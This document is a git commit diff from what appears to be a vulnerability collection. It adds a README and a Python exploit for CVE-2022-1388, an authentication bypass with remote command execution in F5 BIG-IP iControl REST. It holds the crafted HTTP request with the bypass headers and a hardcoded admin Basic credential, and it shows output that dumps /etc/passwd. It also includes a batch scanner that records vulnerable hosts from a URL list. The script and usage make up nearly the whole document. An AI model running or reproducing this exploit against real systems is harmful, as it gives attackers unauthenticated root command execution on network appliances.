add CVE-2022-1388 (F5 BIG-IP iControl REST Auth Bypass RCE)

2022-08-25 17:07:23 +08:00 · 2022-08-25 17:07:23 +08:00 · e777c48a8d
commit e777c48a8d
parent e9c4ec552a
6 changed files with 175 additions and 0 deletions
--- a/99-安全产品漏洞/F5/F5
+++ b/99-安全产品漏洞/F5/F5
@ -0,0 +1,88 @@
+# CVE-2022-1388
+
+> CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE.
+
+```http
+POST /mgmt/tm/util/bash HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host
+Content-type: application/json
+X-F5-Auth-Token: anything
+Authorization: Basic YWRtaW46
+Content-Length: 42
+
+{"command": "run", "utilCmdArgs": "-c id"}
+```
+
+![burp](../../../../../../../download/CVE-2022-1388-main/burp.png)
+
+## Usage
+
+Vulnerability detection against a URL.
+
+```bash
+$ python exp.py -u https://192.168.2.110
+[+] https://192.168.2.110 is vulnerable!!!
+```
+
+Execute arbitrary commands.
+
+```bash
+$ python exp.py -u https://192.168.2.110 -c 'cat /etc/passwd'
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+tmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin
+admin:x:0:500:Admin User:/home/admin:/usr/bin/tmsh
+qemu:x:107:107:qemu user:/:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+oprofile:x:16:16:Special user account to be used by OProfile:/:/sbin/nologin
+syscheck:x:199:10::/:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
+f5_remoteuser:x:499:499:f5 remote user account:/home/f5_remoteuser:/sbin/nologin
+......
+```
+
+Read all URLs in the file and perform vulnerability detection.
+
+```bash
+$ python exp.py -f urls.txt
+[-] https://10.1.6.5 is not vulnerable.
+[+] https://10.1.92.34 is vulnerable!!!
+[+] https://10.2.124.144 is vulnerable!!!
+[+] https://10.1.194.22 is vulnerable!!!
+[+] https://10.2.21.132 is vulnerable!!!
+[+] https://10.1.236.2 is vulnerable!!!
+[+] https://10.3.155.2 is vulnerable!!!
+[+] https://10.2.155.4 is vulnerable!!!
+[+] https://10.3.151.92 is vulnerable!!!
+[+] https://10.4.139.131 is vulnerable!!!
+[+] https://10.7.226.141 is vulnerable!!!
+[+] https://10.1.129.53 is vulnerable!!!
+[+] https://10.9.45.2 is vulnerable!!!
+[+] https://10.5.96.105 is vulnerable!!!
+[+] https://10.3.156.6 is vulnerable!!!
+$ cat success.txt
+https://10.1.92.34
+https://10.2.124.144
+https://10.1.194.22
+https://10.2.21.132
+https://10.1.236.2
+https://10.3.155.2
+https://10.2.155.4
+https://10.3.151.92
+https://10.4.139.131
+https://10.7.226.141
+https://10.1.129.53
+https://10.9.45.2
+https://10.5.96.105
+https://10.3.156.6
+```
+
--- a/99-安全产品漏洞/F5/F5
+++ b/99-安全产品漏洞/F5/F5
@ -0,0 +1,87 @@
+#!/usr/bin/env python3
+# -*- encoding: utf-8 -*-
+"""
+@Desc    :   CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE
+"""
+
+
+import os
+import sys
+import argparse
+import requests
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+
+
+headers = {
+        "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
+        "Content-type": "application/json",
+        "Connection": "close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host",
+        "X-F5-Auth-Token": "anything",
+        "Authorization": "Basic YWRtaW46"}
+
+endpoint = "/mgmt/tm/util/bash"
+
+def usage():
+    print("Eg: \n    python3 exp.py -u https://127.0.0.1")
+    print("    python3 exp.py -u https://127.0.0.1 -c 'cat /etc/passwd'")
+    print("    python3 exp.py -f urls.txt")
+    
+def poc(target):
+    url = requests.utils.urlparse(target).scheme + "://" + requests.utils.urlparse(target).netloc
+    payload = {"command": "run", "utilCmdArgs": "-c id"}
+    try:
+        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
+        if (res.status_code == 200) and ('uid=0(root) gid=0(root) groups=0(root)' in res.text):
+            print("[+] {} is vulnerable!!!".format(url))
+            return True
+        else:
+            print("[-] {} is not vulnerable.".format(url))
+            return False
+    except Exception as e:
+        print("[-] {} Exception: ".format(url) + e)
+        pass
+    
+def exp(target, command):
+    url = requests.utils.urlparse(target).scheme + "://" + requests.utils.urlparse(target).netloc
+    payload = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)}
+    try:
+        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
+        if (res.status_code == 200) and ("tm:util:bash:runstate" in res.text):
+            print(res.json()['commandResult'])
+            return True
+        else:
+            print("[-] {} is not vulnerable.".format(url))
+            return False
+    except Exception as e:
+        print("[-] {} Exception: ".format(url) + e)
+        pass
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(
+        description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE")
+    parser.add_argument('-u', '--url', type=str,
+                        help="vulnerability verification for individual websites")
+    parser.add_argument('-c', '--command', type=str,
+                        help="command execution")
+    parser.add_argument('-f', '--file', type=str,
+                        help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
+    args = parser.parse_args()
+    if len(sys.argv) == 3:
+        if sys.argv[1] in ['-u', '--url']:
+            poc(args.url)
+        elif sys.argv[1] in ['-f', '--file']:
+            if os.path.isfile(args.file) == True:
+                with open(args.file) as target:
+                    urls = []
+                    urls = target.read().splitlines()
+                    for url in urls:
+                        if poc(url) == True:
+                            with open("success.txt", "a+") as f:
+                                f.write(url + "\n")
+    elif len(sys.argv) == 5:
+        if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):
+            exp(args.url, args.command)
+    else:
+        parser.print_help()
+        usage()
--- a/99-安全产品漏洞/F5/F5-BIG-IP未授权RCE/BIG-IP(BIG-IQ)未授权RCE(CVE-2021-22986).docx
+++ b/99-安全产品漏洞/F5/F5-BIG-IP未授权RCE/BIG-IP(BIG-IQ)未授权RCE(CVE-2021-22986).docx
--- a/99-安全产品漏洞/F5/F5-BIG-IP未授权RCE/CVE_2021_22986.py
+++ b/99-安全产品漏洞/F5/F5-BIG-IP未授权RCE/CVE_2021_22986.py
--- a/99-安全产品漏洞/F5/F5-BIG-IP未授权RCE/README.md
+++ b/99-安全产品漏洞/F5/F5-BIG-IP未授权RCE/README.md
--- a/99-安全产品漏洞/F5/F5-BIG-IP未授权RCE/newpoc.py
+++ b/99-安全产品漏洞/F5/F5-BIG-IP未授权RCE/newpoc.py